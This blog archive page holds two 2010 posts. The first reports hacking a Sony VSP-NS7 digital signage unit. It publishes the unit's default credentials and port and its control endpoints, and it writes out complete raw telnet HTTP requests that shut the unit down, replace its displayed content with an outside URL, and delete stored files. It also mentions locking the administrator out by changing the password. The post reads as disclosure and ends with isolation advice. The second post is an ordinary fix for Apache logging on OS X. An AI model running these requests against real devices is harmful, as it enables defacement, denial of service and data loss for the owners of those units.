nDarkness

Archive for September, 2010

Sony VSP-NS7 Digital Signage Hacking

by on Sep.07, 2010, under Computer Security, Privacy, Software

Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    Authorization: Basic NSPXuser:NSPXuser

    space

Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains sofware version, unit name, unit and harddrive serial number and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit

    space

Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?>
<content ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<delete table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
	</delete>
	<insert table=&quot;WEB_TBL&quot;>
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://www.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&amp;append=0&amp;mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?>
<group ver=&quot;1.0&quot; date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>
	<property date=&quot;2010-09-06&quot; time=&quot;21:28:43&quot;>/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&amp;file=/import/group0.xml&amp;mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally let’s force the unit to call our url.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&amp;id=06&amp;index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&amp;table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&amp;table=still&amp;index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed but if the traffic is sniffed, the password can be easily decoded again. Not to mention we can use similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit, is to use a crossover cable and directly connect to the box or put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.

1 Comment :, , , , more...

OS X – Apache Web Sharing Starts But You Are Unable Connect

by on Sep.06, 2010, under Mac OS X, Software

In an effort to save you an afternoon of searching, I thought I would post this to help the OS X users having this issue. There are the usual causes of no content in the web root, firewall blocking requests, incorrect permissions and/or httpd.conf syntax errors. The one error that is a little tougher to track down is apache not being able to create log files. Check the line in the httpd.conf file that shows the path to apache’s log file. It should look something like this:

ErrorLog “/private/var/log/apache2/error_log”

Now if the directory apache2 does not exist in /private/var/log/, apache will fail to start without giving you much of an error message. To correct this, in terminal type:

sudo mkdir /private/var/log/apache2

Enter your admin password and restart apache either in System Preferences=>Sharing=>Web Sharing or in terminal by typing:

 sudo apachectl restart

Once this is done, enter your web address in the web browser and you should see your pages load. Hope this helps!

2 Comments :, , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Blogroll

A few highly recommended websites...